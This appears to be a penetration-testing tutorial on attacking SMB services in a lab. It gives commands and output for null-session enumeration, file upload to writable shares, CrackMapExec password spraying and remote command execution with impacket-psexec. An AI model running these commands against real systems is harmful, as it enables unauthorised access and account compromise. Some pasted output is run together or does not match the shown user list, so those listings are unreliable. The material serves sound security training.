Attacking SMB
Server Message Block (SMB) is a communication protocol created for providing shared access to files and printers across nodes on a network. Initially, it was designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138. However, with Windows 2000, Microsoft added the option to run SMB directly over TCP/IP on port 445 without the extra NetBIOS layer. Nowadays, modern Windows operating systems use SMB over TCP but still support the NetBIOS implementation as a failover.
Samba is a Unix/Linux-based open-source implementation of the SMB protocol. It also allows Linux/Unix servers and Windows clients to use the same SMB services.
For instance, on Windows, SMB can run directly over port 445 TCP/IP without the need for NetBIOS over TCP/IP, but if Windows has NetBIOS enabled, or we are targetting a non-Windows host, we will find SMB running on port 139 TCP/IP. This means that SMB is running with NetBIOS over TCP/IP.
Another protocol that is commonly related to SMB is MSRPC (Microsoft Remote Procedure Call). RPC provides an application developer a generic way to execute a procedure (a.k.a. a function) in a local or remote process without having to understand the network protocols used to support the communication, as specified in MS-RPCE, which defines an RPC over SMB Protocol that can use SMB Protocol named pipes as its underlying transport.
To attack an SMB Server, we need to understand its implementation, operating system, and which tools we can use to abuse it. As with other services, we can abuse misconfiguration or excessive privileges, exploit known vulnerabilities or discover new vulnerabilities. Furthermore, after we gain access to the SMB Service, if we interact with a shared folder, we need to be aware of the content in the directory. Finally, if we are targetting NetBIOS or RPC, identify which information we can get or what action we can perform on the target.
Enumeration
Depending on the SMB implementation and the operating system, we will get different information using Nmap. Keep in mind that when targetting Windows OS, version information is usually not included as part of the Nmap scan results. Instead, Nmap will try to guess the OS version. However, we will often need other scans to identify if the target is vulnerable to a particular exploit. We will cover searching for known vulnerabilities later in this section. For now, let's scan ports 139 and 445 TCP.
Attacking SMB
sasorirose@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 15:15 CEST
Nmap scan report for 10.129.14.128
Host is up (0.00024s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
MAC Address: 00:00:00:00:00:00 (VMware)
Host script results:
|_nbstat: NetBIOS name: HTB, NetBIOS user: , NetBIOS MAC: (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-19T13:16:04
|_ start_date: N/A
The Nmap scan reveals essential information about the target:
- SMB version (Samba smbd 4.6.2)
- Hostname HTB
- Operating System is Linux based on SMB implementation
Let's explore some common misconfigurations and protocols specifics attacks.
Misconfigurations
SMB can be configured not to require authentication, which is often called a null session. Instead, we can log in to a system with no username or password.
Anonymous Authentication
If we find an SMB server that does not require a username and password or find valid credentials, we can get a list of shares, usernames, groups, permissions, policies, services, etc. Most tools that interact with SMB allow null session connectivity, including smbclient, smbmap, rpcclient, or enum4linux. Let's explore how we can interact with file shares and RPC using null authentication.
File Share
Using smbclient, we can display a list of the server's shares with the option -L, and using the option -N, we tell smbclient to use the null session.
Attacking SMB
sasorirose@htb[/htb]$ smbclient -N -L //10.129.14.128
Sharename Type Comment
------- -- -------
ADMIN$ Disk Remote Admin C$ Disk Default share notes Disk CheckIT
IPC$ IPC IPC Service (DEVSM)SMB1 disabled no workgroup available
Smbmap is another tool that helps us enumerate network shares and access associated permissions. An advantage of smbmap is that it provides a list of permissions for each shared folder.
Attacking SMB
sasorirose@htb[/htb]$ smbmap -H 10.129.14.128
[+] IP: 10.129.14.128:445 Name: 10.129.14.128
Disk Permissions Comment
-- --------- -------
ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY IPC Service (DEVSM) notes READ, WRITE CheckIT
Using smbmap with the -r or -R (recursive) option, one can browse the directories:
Attacking SMB
sasorirose@htb[/htb]$ smbmap -H 10.129.14.128 -r notes
[+] Guest session IP: 10.129.14.128:445 Name: 10.129.14.128
Disk Permissions Comment
-- --------- -------
notes READ, WRITE
.\notes\*
dr--r--r 0 Mon Nov 2 00:57:44 2020 .
dr--r--r 0 Mon Nov 2 00:57:44 2020 ..
dr--r--r 0 Mon Nov 2 00:57:44 2020 LDOUJZWBSG
fw--w--w 116 Tue Apr 16 07:43:19 2019 note.txt
fr--r--r 0 Fri Feb 22 07:43:28 2019 SDT65CB.tmp
dr--r--r 0 Mon Nov 2 00:54:57 2020 TPLRNSMWHQ
dr--r--r 0 Mon Nov 2 00:56:51 2020 WDJEQFZPNO
dr--r--r 0 Fri Feb 22 07:44:02 2019 WindowsImageBackup
From the above example, the permissions are set to READ and WRITE, which one can use to upload and download the files.
Attacking SMB
sasorirose@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt"
[+] Starting download: notes\note.txt (116 bytes)
[+] File output to: /htb/10.129.14.128-notes_note.txt
Attacking SMB
sasorirose@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"[+] Starting upload: test.txt (20 bytes)
[+] Upload complete.
Remote Procedure Call (RPC)
We can use the rpcclient tool with a null session to enumerate a workstation or Domain Controller.
The rpcclient tool offers us many different commands to execute specific functions on the SMB server to gather information or modify server attributes like a username. We can use this cheat sheet from the SANS Institute or review the complete list of all these functions found on the man page of the rpcclient.
Attacking SMB
sasorirose@htb[/htb]$ rpcclient -U'%' 10.10.110.17
rpcclient$> enumdomusersuser:[mhope] rid:[0x641]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
Enum4linux is another utility that supports null sessions, and it utilizes nmblookup, net, rpcclient, and smbclient to automate some common enumeration from SMB targets such as:
- Workgroup/Domain name
- Users information
- Operating system information
- Groups information
- Shares Folders
- Password policy information
The original tool was written in Perl and rewritten by Mark Lowe in Python.
Attacking SMB
sasorirose@htb[/htb]$ ./enum4linux-ng.py 10.10.11.45 -A -C
ENUM4LINUX - next generation
==========================
| Target Information |
==========================
[*] Target ........... 10.10.11.45
[*] Username ......... ''
[*] Random Username .. 'noyyglci'
[*] Password ......... ''
====================================
| Service Scan on 10.10.11.45 |
====================================
[*] Checking LDAP (timeout: 5s)
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS (timeout: 5s)
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB (timeout: 5s)
[*] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS (timeout: 5s)
[*] SMB over NetBIOS is accessible on 139/tcp
===================================================
| NetBIOS Names and Workgroup for 10.10.11.45 |
===================================================
[*] Got domain/workgroup name: WORKGROUP
[*] Full NetBIOS names information:
- WIN-752039204 <00> - B Workstation Service
- WORKGROUP <00> - B Workstation Service
- WIN-752039204 <20> - B Workstation Service
- MAC Address = 00-0C-29-D7-17-DB
...
========================================
| SMB Dialect Check on 10.10.11.45 |
========================================
Protocol Specifics Attacks
If a null session is not enabled, we will need credentials to interact with the SMB protocol. Two common ways to obtain credentials are brute forcing and password spraying.
Brute Forcing and Password Spray
When brute-forcing, we try as many passwords as possible against an account, but it can lock out an account if we hit the threshold. We can use brute-forcing and stop before reaching the threshold if we know it. Otherwise, we do not recommend using brute force.
Password spraying is a better alternative since we can target a list of usernames with one common password to avoid account lockouts. We can try more than one password if we know the account lockout threshold. Typically, two to three attempts are safe, provided we wait 30-60 minutes between attempts. Let's explore the tool CrackMapExec that includes the ability to execute password spraying.
With CrackMapExec (CME), we can target multiple IPs, using numerous users and passwords. Let's explore an everyday use case for password spraying. To perform a password spray against one IP, we can use the option -u to specify a file with a user list and -p to specify a password. This will attempt to authenticate every user from the list using the provided password.
Attacking SMB
sasorirose@htb[/htb]$ cat /tmp/userlist.txt
Administrator
jrodriguez
admin
jurena
Attacking SMB
sasorirose@htb[/htb]$ crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-authSMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\Administrator:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\jrodriguez:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\admin:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\eperez:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\amone:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\fsmith:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\tcrash:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [+] WIN7BOX\jurena:Company01! (Pwn3d!)
Note: By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. it is very useful for spraying a single password against a large user list. Additionally, if we are targetting a non-domain joined computer, we will need to use the option --local-auth. For a more detailed study Password Spraying see the Active Directory Enumeration & Attacks module.
For more detailed usage instructions, check out the tool's documentation guide.
SMB
Linux and Windows SMB servers provide different attack paths. Usually, we will only get access to the file system, abuse privileges, or exploit known vulnerabilities in a Linux environment, as we will discuss later in this section. However, in Windows, the attack surface is more significant.
When attacking a Windows SMB Server, our actions will be limited by the privileges we had on the user we manage to compromise. If this user is an Administrator or has specific privileges, we will be able to perform operations such as:
- Remote Command Execution
- Extract Hashes from SAM Database
- Enumerating Logged-on Users
- Pass-the-Hash (PTH)
Let's discuss how we can perform such operations. Additionally, we will learn how the SMB protocol can be abused to retrieve a user's hash as a method to escalate privileges or gain access to a network.
Remote Code Execution (RCE)
Before jumping into how to execute a command on a remote system using SMB, let's talk about Sysinternals. The Windows Sysinternals website was created in 1996 by Mark Russinovich and Bryce Cogswell to offers technical resources and utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment. Microsoft acquired Windows Sysinternals and its assets on July 18, 2006.
Sysinternals featured several freeware tools to administer and monitor computers running Microsoft Windows. The software can now be found on the Microsoft website. One of those freeware tools to administer remote systems is PsExec.
PsExec is a tool that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PSExec service on the remote machine. The PSExec service then creates a named pipe that can send commands to the system.
We can download PsExec from Microsoft website, or we can use some Linux implementations:
- Impacket PsExec - Python PsExec like functionality example using RemComSvc.
- Impacket SMBExec - A similar approach to PsExec without using RemComSvc. The technique is described here. This implementation goes one step further, instantiating a local SMB server to receive the output of the commands. This is useful when the target machine does NOT have a writeable share available.
- Impacket atexec - This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
- CrackMapExec - includes an implementation of smbexec and atexec.
- Metasploit PsExec - Ruby PsExec implementation.
Impacket PsExec
To use impacket-psexec, we need to provide the domain/username, the password, and the IP address of our target machine. For more detailed information we can use impacket help:
Attacking SMB
sasorirose@htb[/htb]$ impacket-psexec -h
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
usage: psexec.py [-h] [-c pathname] [-path PATH] [-file FILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
[-target-ip ip address] [-port [destination port]] [-service-name service_name] [-remote-binary-name remote_binary_name]
target [command ...]
PSEXEC like functionality example using RemComSvc.
positional arguments:
target [[domain/]username[:password]@]
command command (or arguments if -c is used) to execute at the target (w/o path) - (default:cmd.exe)
optional arguments:
-h, --help show this help message and exit
-c pathname copy the filename for later execution, arguments are passed in the command option
-path PATH path of the command to execute
-file FILE alternative RemCom binary (be sure it doesn't require CRT)
-ts adds timestamp to every logging output
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the
ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-keytab KEYTAB Read keys for SPN from keytab file
connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve
it
-port [destination port]
Destination port to connect to SMB Server
-service-name service_name
The name of the service used to trigger the payload
-remote-binary-name remote_binary_name
This will be the name of the executable uploaded on the target
To connect to a remote machine with a local administrator account, using impacket-psexec, you can use the following command:
Attacking SMB
sasorirose@htb[/htb]$ impacket-psexec administrator:'Password123!'@10.10.110.17
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.110.17.....
[*] Found writable share ADMIN$
[*] Uploading file EHtJXgng.exe
[*] Opening SVCManager on 10.10.110.17.....
[*] Creating service nbAc on 10.10.110.17.....
[*] Starting service nbAc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19041.1415]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami && hostname
nt authority\system
WIN7BOX
The same options apply to impacket-smbexec and impacket-atexec.
CrackMapExec
Another tool we can use to run CMD or PowerShell is CrackMapExec. One advantage of CrackMapExec is the availability to run a command on multiples host at a time. To use it, we need to specify the protocol, smb, the IP address or IP address range, the option -u for username, and -p for the password, and the option -x to run cmd commands or uppercase -X to run PowerShell commands.
Attacking SMB
sasorirose@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexecSMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 19041 (name:WIN7BOX) (domain:.) (signing:False) (SMBv1:False)
SMB 10.10.110.17 445 WIN7BOX [+] .\Administrator:Password123! (Pwn3d!)
SMB 10.10.110.17 445 WIN7BOX [+] Executed command via smbexec
SMB 10.10.110.17 445 WIN7BOX nt authority\system
Note: If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.
Enumerating Logged-on Users
Imagine we are in a network with multiple machines. Some of them share the same local administrator account. In this case, we could use CrackMapExec to enumerate logged-on users on all machines within the same network 10.10.110.17/24, which speeds up our enumeration process.
Attacking SMB
sasorirose@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-usersSMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB 10.10.110.17 445 WIN7BOX [+] WIN7BOX\administrator:Password123! (Pwn3d!)
SMB 10.10.110.17 445 WIN7BOX [+] Enumerated loggedon users
SMB 10.10.110.17 445 WIN7BOX WIN7BOX\Administrator logon_server: WIN7BOX
SMB 10.10.110.17 445 WIN7BOX WIN7BOX\jurena logon_server: WIN7BOX
SMB 10.10.110.21 445 WIN10BOX [*] Windows 10.0 Build 19041 (name:WIN10BOX) (domain:WIN10BOX) (signing:False) (SMBv1:False)
SMB 10.10.110.21 445 WIN10BOX [+] WIN10BOX\Administrator:Password123! (Pwn3d!)
SMB 10.10.110.21 445 WIN10BOX [+] Enumerated loggedon users
SMB 10.10.110.21 445 WIN10BOX WIN10BOX\demouser logon_server: WIN10BOX